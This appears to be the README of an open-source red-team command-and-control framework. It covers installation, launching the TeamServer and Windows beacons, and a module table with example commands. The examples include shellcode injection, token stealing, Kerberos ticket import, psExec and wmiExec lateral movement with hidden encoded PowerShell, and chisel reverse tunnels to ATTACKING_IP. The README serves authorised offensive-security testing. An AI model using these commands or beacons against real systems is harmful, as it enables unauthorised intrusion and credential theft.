Exploration is a rudimentary redteam Command and Control framework.
This repository contains the TeamServer and the Client.
The release includes the TeamServer the Client with preconfigured certificate as well as the beacons and modules for windows from C2Implant.
wget -q $(wget -q -O - 'https://api.github.com/repos/maxDcb/C2TeamServer/releases/latest' | jq -r '.assets[] | select(.name=="Release.tar.gz").browser_download_url') -O ./C2TeamServer.tar.gz
mkdir C2TeamServer && tar xf C2TeamServer.tar.gz -C C2TeamServer --strip-components 1
The TeamServer is a stand alone application, coded in c++, that handle listeners. The client, coded in python, communicate with the TeamServer through GRPC.
Beacons run on the victime host. Each Beacons which connects back to the TeamServer open a new session. This session is used to control the Beacon, send commands and receive results.
Listener and Beacons can communicate through TCP, SMB, HTTP ,HTTPS and Github issues depending on the situation.
A compiled version of the TeamServer is ready to use in the Releases, with some default certificats for GRPC communication and HTTP Listener:
The TeamServer binary is in Release/TeamServer
it's launched using
cd Release/TeamServer
./TeamServer
The Python Client is in Release/Client It's launched using 'python3 GUI.py'
cd Release/Client
# --dev is to specify that the GRPC hostname in the SSL certificat will not be checked
# --ip is the ip of the TeamServer
python3 GUI.py --ip 127.0.0.0 --port 50051 --dev
4 types of listeners are available from the TeamServer: HTTP, HTTPS that start a web server on the given port, TCP that start a TCP server on the given port and GitHub that use GitHub issues from a project like "maxDcb/C2TeamServer" and a personal access token (with issues write rights).
Winodws Beacons and command modules are compiled separately in another project, but a compiled version is provided in ./Release/Beacons and ./Release/Modules to be able to use it directly.
To launch a beacon available in ./Release/Beacons use the following syntax on a windows machine:
.\BeaconHttp.exe IP_TEAMSERVER PORT_LISTENER http/https
.\BeaconHttp.exe 10.10.52.5 8443 https
.\BeaconHttp.exe 10.10.52.5 80 http
When the Beacon is started and connect to the TeamServer, a new session is started from where you can interact with the Beacon:
Windows beacon uses primarily windows API and start with no module loaded. Modules are loaded at runtime using "MemoryModule" project to load DLL sent by the TeamServer to the beacon.
| Modules | Description |
|---|---|
| loadModule | Load module DLL file on the memory of the beacon, giving the beacon this capability. Load the DLL from the given path, if it's not found try the default ../Modules/ path.exemple: - loadModule /tools/PrintWorkingDirectory.dll |
| assemblyExec | Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec). Retrieve the output. Use -r to use a shellcode file. If -e or -d are given, use donut to create the shellcode. exemple: - assemblyExec -r ./shellcode.bin - assemblyExec -e ./program.exe arg1 arg2... - assemblyExec -e ./Seatbelt.exe -group=system - assemblyExec -d ./test.dll method arg1 arg2... |
| upload | Upload a file from the attacker machine to the victime machine exemple: - upload c:\temp\toto.exe c:\temp\toto.exe |
| download | Download a file from victime machine to the attacker machine exemple: - download c:\temp\toto.exe c:\temp\toto.exe |
| run | Run new process on the system. If the cmd is a system cmd use the following syntax 'cmd /c command'. The beacon wait for the cmd to end and provide the output.' exemple: - run whoami - run cmd /c dir - run .\Seatbelt.exe -group=system |
| script | - |
| inject | Inject shellcode in the pid process. For linux must be root or at least have ptrace capability. No output is provided. Use -r to use a shellcode file. If -e or -d are given, use donut to create the shellcode. If pid is negative a new process is created for the injection. exemple: - inject -r ./calc.bin 2568 - inject -e ./beacon.exe pid arg1 arg2 - inject -d ./calc.dll pid method arg1 arg2 |
| pwd | PrintWorkingDirectory |
| cd | ChangeDirectory |
| ls | ListDirectory |
| ps | ListProcesses |
| makeToken | Create a token from user and password and impersonate it. exemple: - makeToken DOMAIN\Username Password |
| rev2self | Drop the impersonation of a token, created with makeToken exemple: - rev2self |
| stealToken | Steal a token and impersonate the it. You must have administrator privilege. exemple: - stealToken pid |
| coffLoader | Load a .o coff file and execute it. Coff take packed argument as entry, you get to specify the type as a string of [Z,z,s,i] for wstring, string, short, int. exemple: - coffLoader ./dir.x64.o go Zs c:\ 0 - coffLoader ./whoami.x64.o |
| powershell | Execute a powershell command. To be sure to get the output of the commande do 'cmd |
| kerberosUseTicket | Import a kerberos ticket from a file to the curent LUID. exemple: - KerberosUseTicket /tmp/ticket.kirbi |
| psExec | Create an exe on an SMB share of the victime and a service to launch this exec using system. The exe must be a service binary or inject into another process. You must have the right kerberos tickets. exemple: - psExec m3dc.cyber.local /tmp/implant.exe - psExec 10.9.20.10 /tmp/implant.exe |
| wmiExec | Execute a command through Windows Management Instrumentation (WMI). The user have to be administrator of the remote machine. Can be use with credentials or with kerberos authentication. To use with kerberos, the ticket must be in memory (use Rubeus). exemple: - wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV - wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV |
| spawnAs | Launch a new process as another user, with the given credentials. exemple: - spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA... - spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe |
| chisel | Launch chisel in a thread on the remote server. No output is provided. exemple: - chisel status - chisel stop pid Reverse Socks Proxy: - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks - On the attacking machine: chisel server -p LISTEN_PORT --reverse Remote Port Forward: - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOT_PORT - On the attacking machine: chisel server -p LISTEN_PORT --reverse |
| tree | Tree |
AssemblyExec & Inject, that use Donut project, make it possible to launch binary EXE, DLL, managed or unmanaged direclty from memory on the remote host.
Coff, that use COFFLoader project, is used to run Coff files.
Two side projects can be used to deliver the beacons:
A very basic Linux Beacons coded in python and can be found here: C2ImplantPy.
An other very basic Linux Beacons coded in Nim and can be found here: C2ImplantPy.
- Donut: Creat shellcode from PE files.
- cpp-httplib: Http and Https Listener.
- CoffLoader: Run object files from CS-Situational-Awareness-BOF.
- MemoryModule: Load DLL at runtime.
- UnmanagedPowerShell: Powershell for unmanaged code.
- cpp-base64: base64.
- json: json parser.
sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64
sudo apt install golang-cfssl
sudo apt install cmake
pip3 install pycryptodome
pip install conan
pip install grpcio
pip install PyQt5
pip install pyqtdarktheme
pip install protobuf
conan profile detect
git clone https://github.com/maxDcb/C2TeamServer.git
cd C2TeamServer
git submodule update --init
mkdir build
cd build
cmake ..
make -j4
The TeamServer binary is in ./Release/TeamServer
it's launched using './TeamServer'
The Python Client is in ./Release/Client
It's launched using 'python3 GUI.py'
